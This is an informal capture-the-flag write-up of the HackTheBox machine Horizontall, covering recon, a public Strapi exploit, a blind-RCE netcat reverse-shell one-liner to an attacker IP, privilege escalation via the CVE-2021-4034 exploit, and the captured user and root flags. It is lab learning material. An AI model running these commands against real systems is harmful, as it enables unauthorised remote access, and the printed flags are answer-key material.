CTF Horizontall

  1. Description
  2. nmap
  3. Port 80
  4. Javascript
  5. gobuster
  6. exploit strapi
  7. Strapi shell
  8. exploit
    1. Upload
    2. Make

Description

Horizontal from HTB.

nmap

nmap -sV -p- 10.10.11.105
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.14.0 (Ubuntu)

Port 80

It’s forbiden, I have to add the dns:

/etc/hosts
10.10.11.105 horizontall.htb

Javascript

The file /js/app.c68eb462.js is obfuscated I have to use a tool to read it.
https://lelinhtinh.github.io/de4js/
I found the link http://api-prod.horizontall.htb/reviews
I have to add it to my /etc/hosts file.

gobuster

gobuster dir -u http://api-prod.horizontall.htb/ -w Documents/wordlist/directory-list-2.3-small.txt -t 150 --wildcard switch | grep "(Status:"
/admin                (Status: 200) [Size: 854]
/users                (Status: 403) [Size: 60] 
/reviews              (Status: 200) [Size: 507]
/Reviews              (Status: 200) [Size: 507]
/Users                (Status: 403) [Size: 60] 
/Admin                (Status: 200) [Size: 854]
/REVIEWS              (Status: 200) [Size: 507]

In admin we have the login page to strapi
In reviews we have a json file.

exploit strapi

https://www.exploit-db.com/exploits/50239

python3 50239.py http://api-prod.horizontall.htb

The shell is broken but we have the creds.

[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1

One week later…

Ok, the credentials are useless, I have to use the blind RCE,

On my computer:

nc -nlvp 4242

Blind RCE:

rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.214 4242 >/tmp/f

And I’m in.

Strapi shell

In /home/developer/user.txt:
e6cb8f6f0831dc40507c330d548ea384

exploit

Upload

Look at this boy, it’s so cool

dragon *

Make

This is a new exploit, released 2 days ago.
https://github.com/berdav/CVE-2021-4034

I’m using dragon to drag and drop my files.

cat /root/root.txt

373da3c143300dec7f9357b24c8b202a

I really feel like a god xD Every computer are vulnerable, you have to update your system, When I’v started the box the exploit was not availible.